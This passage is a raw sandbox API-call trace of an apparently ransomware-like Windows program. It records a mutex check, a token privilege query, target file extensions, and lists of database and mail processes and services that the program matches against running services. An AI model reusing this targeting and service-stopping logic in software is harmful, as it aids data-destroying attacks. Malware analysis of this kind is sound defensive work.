(hModule=0x76f10000, lpProcName="gethostbyname") returned 0x76f46cb0 [0152.795] GetProcAddress (hModule=0x76f10000, lpProcName="inet_addr") returned 0x76f29160 [0152.795] GetProcAddress (hModule=0x76f10000, lpProcName="ntohl") returned 0x76f149d0 [0152.795] GetProcAddress (hModule=0x76f10000, lpProcName="htonl") returned 0x76f149d0 [0152.795] GetProcAddress (hModule=0x76f10000, lpProcName="htons") returned 0x76f28ff0 [0152.795] GetProcessHeap () returned 0x6a0000 [0152.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6ab0e0 [0152.796] QueryPerformanceCounter (in: lpPerformanceCount=0x19fdb0 | out: lpPerformanceCount=0x19fdb0*=7330864441) returned 1 [0152.796] GetTickCount () returned 0x11e31 [0152.796] GetCurrentProcessId () returned 0xe24 [0152.798] GetTickCount () returned 0x11e31 [0152.798] GetTickCount () returned 0x11e31 [0152.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6ab068 [0152.799] GetVersion () returned 0x23f00206 [0152.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7) returned 0x6b6e00 [0152.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6b7de8 [0152.799] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b7de8, Size=0x20) returned 0x6ab108 [0152.799] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ab108, Size=0x40) returned 0x6b7790 [0152.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x6bd850 [0152.863] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_1TPBM0A") returned 0x0 [0152.863] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_1TPBM0A") returned 0x1ec [0152.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6e00 | out: hHeap=0x6a0000) returned 1 [0152.863] lstrlenW (lpString="Global\\syncronize_") returned 18 [0152.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7790 | out: hHeap=0x6a0000) returned 1 [0152.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7) returned 0x6b6e30 [0152.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6b7f08 [0152.864] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b7f08, Size=0x20) returned 0x6ab108 [0152.864] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ab108, Size=0x40) returned 0x6b79d0 [0152.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x6cd858 [0152.864] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_1TPBM0U") returned 0x0 [0152.864] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_1TPBM0U") returned 0x1f0 [0152.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6e30 | out: hHeap=0x6a0000) returned 1 [0152.864] lstrlenW (lpString="Global\\syncronize_") returned 18 [0152.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b79d0 | out: hHeap=0x6a0000) returned 1 [0152.864] GetVersion () returned 0x23f00206 [0152.864] GetCurrentProcess () returned 0xffffffff [0152.864] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fd9c | out: TokenHandle=0x19fd9c*=0x1f4) returned 1 [0152.864] GetTokenInformation (in: TokenHandle=0x1f4, TokenInformationClass=0x14, TokenInformation=0x19fd98, TokenInformationLength=0x4, ReturnLength=0x19fda4 | out: TokenInformation=0x19fd98, ReturnLength=0x19fda4) returned 1 [0152.864] CloseHandle (hObject=0x1f4) returned 1 [0152.864] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x0) returned 0x0 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x6b6770 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6b8058 [0152.865] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b8058, Size=0x20) returned 0x6ab108 [0152.865] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ab108, Size=0x40) returned 0x6b79d0 [0152.865] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b79d0, Size=0x80) returned 0x6b26a0 [0152.865] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b26a0, Size=0x100) returned 0x6b7c10 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x34) returned 0x6ba6f0 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6b6d60 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6b6db0 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6b6e30 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6b8058 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6b6dd0 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6b7ea8 [0152.865] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b6dd0, Size=0x8) returned 0x6b6e00 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6b7d70 [0152.865] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b6e00, Size=0x10) returned 0x6b7ed8 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6b7f38 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6b7db8 [0152.865] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b7ed8, Size=0x20) returned 0x6ab108 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6b7de8 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6b7f50 [0152.865] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b6d60, Size=0x8) returned 0x6b6dd0 [0152.865] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b6db0, Size=0x8) returned 0x6b6e00 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6b6d60 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6b7ed8 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6b6e40 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6b7f08 [0152.865] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b6e40, Size=0x8) returned 0x6b6db0 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6b8118 [0152.865] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b6db0, Size=0x10) returned 0x6b8130 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6b8100 [0152.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6b6e40 [0152.866] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b8130, Size=0x20) returned 0x6ddcc8 [0152.866] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b6dd0, Size=0x10) returned 0x6b8130 [0152.866] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b6e00, Size=0x10) returned 0x6b8070 [0152.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6b6e00 [0152.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6b8088 [0152.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6b6db0 [0152.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6b80a0 [0152.866] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b6db0, Size=0x8) returned 0x6b6dd0 [0152.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6b6e50 [0152.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6b80b8 [0152.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6b6db0 [0152.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6b80d0 [0152.866] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b6db0, Size=0x8) returned 0x6de298 [0152.866] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b8130, Size=0x20) returned 0x6ddb88 [0152.866] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b8070, Size=0x20) returned 0x6dd958 [0152.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6de2b8 [0152.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6b80e8 [0152.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6de2a8 [0152.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6b8130 [0152.866] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de2a8, Size=0x8) returned 0x6de348 [0152.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x6b6470 [0152.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x6b66f0 [0152.866] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0152.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7c10 | out: hHeap=0x6a0000) returned 1 [0152.866] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19fde8 | out: lpWSAData=0x19fde8) returned 0 [0152.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6b8070 [0152.875] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b8070, Size=0x20) returned 0x6ddc00 [0152.875] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddc00, Size=0x40) returned 0x6b76b8 [0152.875] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b76b8, Size=0x80) returned 0x6b8578 [0152.875] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b8578, Size=0x100) returned 0x6b8578 [0152.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6b8070 [0152.875] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b8070, Size=0x20) returned 0x6dd980 [0152.875] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6dd980, Size=0x40) returned 0x6b7598 [0152.875] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b7598, Size=0x80) returned 0x6e2fe8 [0152.875] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e2fe8, Size=0x100) returned 0x6e2fe8 [0152.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6b8070 [0152.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6de3b8 [0152.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e34e0 [0152.875] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de3b8, Size=0x8) returned 0x6de2c8 [0152.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x6b6670 [0152.875] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de2c8, Size=0x10) returned 0x6e3438 [0152.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x6b65f0 [0152.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1a) returned 0x6ddb38 [0152.876] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3438, Size=0x20) returned 0x6ddca0 [0152.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x6ddae8 [0152.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x16) returned 0x6b67d0 [0152.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1a) returned 0x6ddac0 [0152.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e3450 [0152.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6de328 [0152.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b7790 [0152.876] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de328, Size=0x8) returned 0x6de3c8 [0152.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3c) returned 0x6b79d0 [0152.876] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de3c8, Size=0x10) returned 0x6e34b0 [0152.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x6b66b0 [0152.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x6b6610 [0152.876] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e34b0, Size=0x20) returned 0x6dda98 [0152.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b5670 [0152.876] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0152.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8578 | out: hHeap=0x6a0000) returned 1 [0152.876] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0152.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e2fe8 | out: hHeap=0x6a0000) returned 1 [0152.876] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6ddc50 [0152.947] EnumServicesStatusExW (in: hSCManager=0x6ddc50, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0) returned 0 [0152.951] GetLastError () returned 0xea [0152.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1b4e) returned 0x6e52e8 [0152.951] EnumServicesStatusExW (in: hSCManager=0x6ddc50, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6e52e8, cbBufSize=0x1b4e, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6e52e8, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0) returned 1 [0152.952] CloseServiceHandle (hSCObject=0x6ddc50) returned 1 [0152.953] lstrlenW (lpString="AppXSvc") returned 7 [0152.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0152.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0152.980] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0152.980] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0152.980] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0152.980] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0152.980] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0152.981] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0152.981] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0152.981] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0152.981] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0152.981] lstrlenW (lpString="Audiosrv") returned 8 [0152.981] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0152.981] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0152.981] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0152.981] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0152.981] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0152.981] lstrlenW (lpString="BFE") returned 3 [0152.981] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0152.981] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0152.981] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0152.981] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0152.981] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0152.981] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0152.981] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0152.981] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0152.982] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0152.982] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0152.982] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0152.982] lstrlenW (lpString="CDPSvc") returned 6 [0152.982] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0152.982] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0152.982] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0152.982] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0152.982] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0152.982] lstrlenW (lpString="ClickToRunSvc") returned 13 [0152.982] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0152.982] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0152.982] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0152.982] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0152.982] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0152.982] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0152.982] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0152.982] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0152.982] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0152.982] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0152.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0152.983] lstrlenW (lpString="CryptSvc") returned 8 [0152.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0152.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0152.983] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0152.983] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0152.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0152.983] lstrlenW (lpString="DcomLaunch") returned 10 [0152.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0152.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0152.983] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0152.983] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0152.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0152.983] lstrlenW (lpString="DeviceAssociationService") returned 24 [0152.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0152.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0152.983] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0152.983] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0152.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0152.983] lstrlenW (lpString="Dhcp") returned 4 [0152.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0152.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0152.983] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0152.983] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0152.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0152.983] lstrlenW (lpString="Dnscache") returned 8 [0152.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0152.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0152.983] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0152.984] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0152.984] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0152.984] lstrlenW (lpString="DPS") returned 3 [0152.984] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0152.984] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0152.984] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0152.984] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0152.984] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0152.984] lstrlenW (lpString="DusmSvc") returned 7 [0152.984] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0152.984] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0152.984] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0152.984] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0152.984] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0152.984] lstrlenW (lpString="EventLog") returned 8 [0152.984] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0152.984] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0152.984] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0152.984] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0152.984] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0152.984] lstrlenW (lpString="EventSystem") returned 11 [0152.984] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0152.984] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0152.984] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0152.985] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0152.985] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0152.985] lstrlenW (lpString="FontCache") returned 9 [0152.985] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0152.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0152.985] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0152.985] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0152.985] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0152.985] lstrlenW (lpString="gpsvc") returned 5 [0152.985] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0152.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0152.985] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0152.985] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0152.985] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0152.985] lstrlenW (lpString="iphlpsvc") returned 8 [0152.985] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0152.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0152.985] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0152.985] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0152.985] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0152.986] lstrlenW (lpString="KeyIso") returned 6 [0152.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0152.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0152.986] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0152.986] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0152.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0152.986] lstrlenW (lpString="LanmanServer") returned 12 [0152.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0152.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0152.986] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0152.986] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0152.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0152.986] lstrlenW (lpString="LanmanWorkstation") returned 17 [0152.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0152.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0152.986] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0152.986] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0152.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0152.986] lstrlenW (lpString="lfsvc") returned 5 [0152.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0152.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0152.987] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0152.987] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0152.987] lstrcmpiW 